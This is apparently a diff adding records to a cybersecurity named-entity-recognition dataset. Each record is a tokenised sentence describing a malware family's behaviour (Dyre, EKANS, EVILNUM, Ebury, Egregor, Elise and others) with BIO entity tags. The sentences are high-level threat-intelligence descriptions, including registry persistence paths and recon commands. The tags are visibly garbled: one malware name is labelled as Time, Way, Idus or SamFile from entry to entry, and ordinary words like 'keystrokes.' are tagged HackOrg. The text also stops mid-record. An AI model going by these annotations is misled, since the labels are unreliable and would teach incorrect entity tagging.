"to", + "achieve", + "persistence", + "by", + "adding", + "a", + "new", + "task", + "in", + "the", + "task", + "scheduler", + "to", + "run", + "every", + "minute." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "identify", + "installed", + "programs", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "been", + "delivered", + "with", + "encrypted", + "resources", + "and", + "must", + "be", + "unpacked", + "for", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "can", + "detect", + "sandbox", + "analysis", + "environments", + "by", + "inspecting", + "the", + "process", + "list", + "and", + "Registry." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "identify", + "the", + "computer", + "name,", + "OS", + "version,", + "and", + "hardware", + "configuration", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "identify", + "network", + "settings", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "identify", + "the", + "users", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "has", + "the", + "ability", + "to", + "identify", + "running", + "services", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "uses", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Dyre", + "registers", + "itself", + "as", + "a", + "service", + "by", + "adding", + "several", + "Registry", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "B-Features", + "B-Way" + ] + }, + { + "tokens": [ + "ECCENTRICBANDWAGON", + "can", + "delete", + "log", + "files", + "generated", + "from", + "the", + "malware", + "stored", + "at", + "<code>C:\\windows\\temp\\tmp0207</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ECCENTRICBANDWAGON", + "can", + "capture", + "and", + "store", + "keystrokes." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ECCENTRICBANDWAGON", + "has", + "stored", + "keystrokes", + "and", + "screenshots", + "within", + "the", + "<code>%temp%\\GoogleChrome</code>,", + "<code>%temp%\\Downloads</code>,", + "and", + "<code>%temp%\\TrendMicroUpdate</code>", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ECCENTRICBANDWAGON", + "has", + "encrypted", + "strings", + "with", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ECCENTRICBANDWAGON", + "can", + "capture", + "screenshots", + "and", + "store", + "them", + "locally." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ECCENTRICBANDWAGON", + "can", + "use", + "cmd", + "to", + "execute", + "commands", + "on", + "a", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "uses", + "standard", + "encryption", + "library", + "functions", + "to", + "encrypt", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "stops", + "processes", + "related", + "to", + "security", + "and", + "management", + "software." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "removes", + "backups", + "of", + "Volume", + "Shadow", + "Copies", + "to", + "disable", + "any", + "restoration", + "capabilities." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-HackOrg", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "has", + "been", + "disguised", + "as", + "<code>update.exe</code>", + "to", + "appear", + "as", + "a", + "valid", + "executable." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "uses", + "encoded", + "strings", + "in", + "its", + "process", + "kill", + "list." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "looks", + "for", + "processes", + "from", + "a", + "hard-coded", + "list." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "stops", + "database,", + "data", + "backup", + "solution,", + "antivirus,", + "and", + "ICS-related", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "can", + "determine", + "the", + "domain", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EKANS", + "can", + "use", + "Windows", + "Mangement", + "Instrumentation", + "(WMI)", + "calls", + "to", + "execute", + "operations." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Exp", + "B-SecTeam", + "B-SecTeam", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "ELMER", + "is", + "capable", + "of", + "performing", + "directory", + "listings." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ELMER", + "is", + "capable", + "of", + "performing", + "process", + "listings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "ELMER", + "uses", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "upload", + "files", + "over", + "the", + "C2", + "channel", + "from", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "has", + "a", + "function", + "called", + "\"DeleteLeftovers\"", + "to", + "remove", + "certain", + "artifacts", + "of", + "the", + "attack." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "B-OffAct" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "download", + "and", + "upload", + "files", + "to", + "the", + "victim's", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "make", + "modifications", + "to", + "the", + "Regsitry", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "has", + "used", + "a", + "one-way", + "communication", + "method", + "via", + "GitLab", + "and", + "Digital", + "Point", + "to", + "perform", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "achieve", + "persistence", + "through", + "the", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "run", + "a", + "remote", + "scriptlet", + "that", + "drops", + "a", + "file", + "and", + "executes", + "it", + "via", + "regsvr32.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "execute", + "commands", + "and", + "scripts", + "through", + "rundll32." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "search", + "for", + "anti-virus", + "products", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "harvest", + "cookies", + "and", + "upload", + "them", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "obtain", + "the", + "computer", + "name", + "from", + "the", + "victim's", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "can", + "obtain", + "the", + "username", + "from", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "has", + "changed", + "the", + "creation", + "date", + "of", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "EVILNUM", + "has", + "used", + "the", + "Windows", + "Management", + "Instrumentation", + "(WMI)", + "tool", + "to", + "enumerate", + "infected", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "can", + "automatically", + "exfiltrate", + "gathered", + "SSH", + "credentials." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "installed", + "a", + "self-signed", + "RPM", + "package", + "mimicking", + "the", + "original", + "system", + "package", + "on", + "RPM", + "based", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "been", + "embedded", + "into", + "modified", + "OpenSSH", + "binaries", + "to", + "gain", + "persistent", + "access", + "to", + "SSH", + "credential", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "used", + "DNS", + "requests", + "over", + "UDP", + "port", + "53", + "for", + "C2." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "verified", + "C2", + "domain", + "ownership", + "by", + "decrypting", + "the", + "TXT", + "record", + "using", + "an", + "embedded", + "RSA", + "public", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "can", + "disable", + "SELinux", + "Role-Based", + "Access", + "Control", + "and", + "deactivate", + "PAM", + "modules." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "used", + "a", + "DGA", + "to", + "generate", + "a", + "domain", + "name", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "injected", + "its", + "dynamic", + "library", + "into", + "descendent", + "processes", + "of", + "sshd", + "via", + "LD_PRELOAD." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ebury", + "can", + "exfiltrate", + "SSH", + "credentials", + "through", + "custom", + "DNS", + "queries." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-SamFile", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "implemented", + "a", + "fallback", + "mechanism", + "to", + "begin", + "using", + "a", + "DGA", + "when", + "the", + "attacker", + "hasn't", + "connected", + "to", + "the", + "infected", + "system", + "for", + "three", + "days." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "can", + "list", + "directory", + "entries." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "can", + "hook", + "logging", + "functions", + "so", + "that", + "nothing", + "from", + "the", + "backdoor", + "gets", + "sent", + "to", + "the", + "logging", + "facility." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "can", + "intercept", + "private", + "keys", + "using", + "a", + "trojanized", + "<code>ssh-add</code>", + "function." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "obfuscated", + "its", + "strings", + "with", + "a", + "simple", + "XOR", + "encryption", + "with", + "a", + "static", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "can", + "deactivate", + "PAM", + "modules", + "to", + "tamper", + "with", + "the", + "sshd", + "configuration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "intercepted", + "unencrypted", + "private", + "keys", + "as", + "well", + "as", + "private", + "key", + "pass-phrases." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "used", + "Python", + "to", + "implement", + "its", + "DGA." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "used", + "user", + "mode", + "rootkit", + "techniques", + "to", + "remain", + "hidden", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "encoded", + "C2", + "traffic", + "in", + "hexadecimal", + "format." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ebury", + "has", + "encrypted", + "C2", + "traffic", + "using", + "the", + "client", + "IP", + "address,", + "then", + "encoded", + "it", + "as", + "a", + "hexadecimal", + "string." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ecipekac", + "has", + "used", + "a", + "valid,", + "legitimate", + "digital", + "signature", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ecipekac", + "can", + "abuse", + "the", + "legitimate", + "application", + "policytool.exe", + "to", + "load", + "a", + "malicious", + "DLL." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ecipekac", + "has", + "the", + "ability", + "to", + "decrypt", + "fileless", + "loader", + "modules." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ecipekac", + "can", + "download", + "additional", + "payloads", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ecipekac", + "can", + "use", + "XOR,", + "AES,", + "and", + "DES", + "to", + "encrypt", + "loader", + "shellcode." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "BITSadmin", + "to", + "download", + "and", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "DLL", + "side-loading", + "to", + "execute", + "its", + "payload." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "encrypt", + "all", + "non-system", + "files", + "using", + "a", + "hybrid", + "AES-RSA", + "algorithm", + "prior", + "to", + "displaying", + "a", + "ransom", + "note." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "collect", + "any", + "files", + "found", + "in", + "the", + "enumerated", + "drivers", + "before", + "sending", + "it", + "to", + "its", + "C2", + "channel." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "been", + "decrypted", + "before", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "disabled", + "Windows", + "Defender", + "to", + "evade", + "protections." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "conduct", + "Active", + "Directory", + "reconnaissance", + "using", + "tools", + "such", + "as", + "Sharphound", + "or", + "AdFind." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "modify", + "the", + "GPO", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "the", + "ability", + "to", + "download", + "files", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "masqueraded", + "the", + "svchost.exe", + "process", + "to", + "exfiltrate", + "data." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "the", + "Windows", + "API", + "to", + "make", + "detection", + "more", + "difficult." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "an", + "encoded", + "PowerShell", + "command", + "by", + "a", + "service", + "created", + "by", + "Cobalt", + "Strike", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "inject", + "its", + "payload", + "into", + "iexplore.exe", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "regsvr32.exe", + "to", + "execute", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "checked", + "for", + "the", + "LogMein", + "event", + "log", + "in", + "an", + "attempt", + "to", + "encrypt", + "files", + "in", + "remote", + "machines." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "rundll32", + "during", + "execution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor's", + "payloads", + "are", + "custom-packed,", + "archived", + "and", + "encrypted", + "to", + "prevent", + "analysis." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "perform", + "a", + "language", + "check", + "of", + "the", + "infected", + "system", + "and", + "can", + "query", + "the", + "CPU", + "information", + "(cupid)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "enumerate", + "all", + "connected", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "tools", + "to", + "gather", + "information", + "about", + "users." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "contains", + "functionality", + "to", + "query", + "the", + "local/system", + "time." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "can", + "perform", + "a", + "long", + "sleep", + "(greater", + "than", + "or", + "equal", + "to", + "3", + "minutes)", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "multiple", + "anti-analysis", + "and", + "anti-sandbox", + "techniques", + "to", + "prevent", + "automated", + "analysis", + "by", + "sandboxes." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "communicated", + "with", + "its", + "C2", + "servers", + "via", + "HTTPS", + "protocol." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Egregor", + "has", + "used", + "batch", + "files", + "for", + "execution", + "and", + "can", + "launch", + "Internet", + "Explorer", + "from", + "cmd.exe." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Elise", + "injects", + "DLL", + "files", + "into", + "iexplore.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Elise", + "encrypts", + "several", + "of", + "its", + "files,", + "including", + "configuration", + "files." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Elise", + "is", + "capable", + "of", + "launching", + "a", + "remote", + "shell", + "on", + "the", + "host", + "to", + "delete", + "itself." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "variant", + "of", + "Elise", + "executes", + "<code>dir", + "C:\\progra~1</code>", + "when", + "initially", + "run." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "can", + "download", + "additional", + "files", + "from", + "the", + "C2", + "server", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "executes", + "<code>net", + "user</code>", + "after", + "initial", + "communication", + "is", + "made", + "to", + "the", + "remote", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "creates", + "a", + "file", + "in", + "<code>AppData\\Local\\Microsoft\\Windows\\Explorer</code>", + "and", + "stores", + "all", + "harvested", + "data", + "in", + "that", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "installing", + "itself", + "as", + "a", + "service", + "fails,", + "Elise", + "instead", + "writes", + "itself", + "as", + "a", + "file", + "named", + "svchost.exe", + "saved", + "in", + "%APPDATA%\\Microsoft\\Network." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Elise", + "enumerates", + "processes", + "via", + "the", + "<code>tasklist</code>", + "command." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "establishing", + "persistence", + "by", + "installation", + "as", + "a", + "new", + "service", + "fails,", + "one", + "variant", + "of", + "Elise", + "establishes", + "persistence", + "for", + "the", + "created", + ".exe", + "file", + "by", + "setting", + "the", + "following", + "Registry", + "key:", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\svchost", + ":", + "%APPDATA%\\Microsoft\\Network\\svchost.exe</code>.", + "Other", + "variants", + "have", + "set", + "the", + "following", + "Registry", + "keys", + "for", + "persistence:", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\imejp", + ":", + "[self]</code>", + "and", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\IAStorD</code>." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "copying", + "itself", + "to", + "a", + "DLL", + "file,", + "a", + "variant", + "of", + "Elise", + "calls", + "the", + "DLL", + "file", + "using", + "rundll32.exe." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + 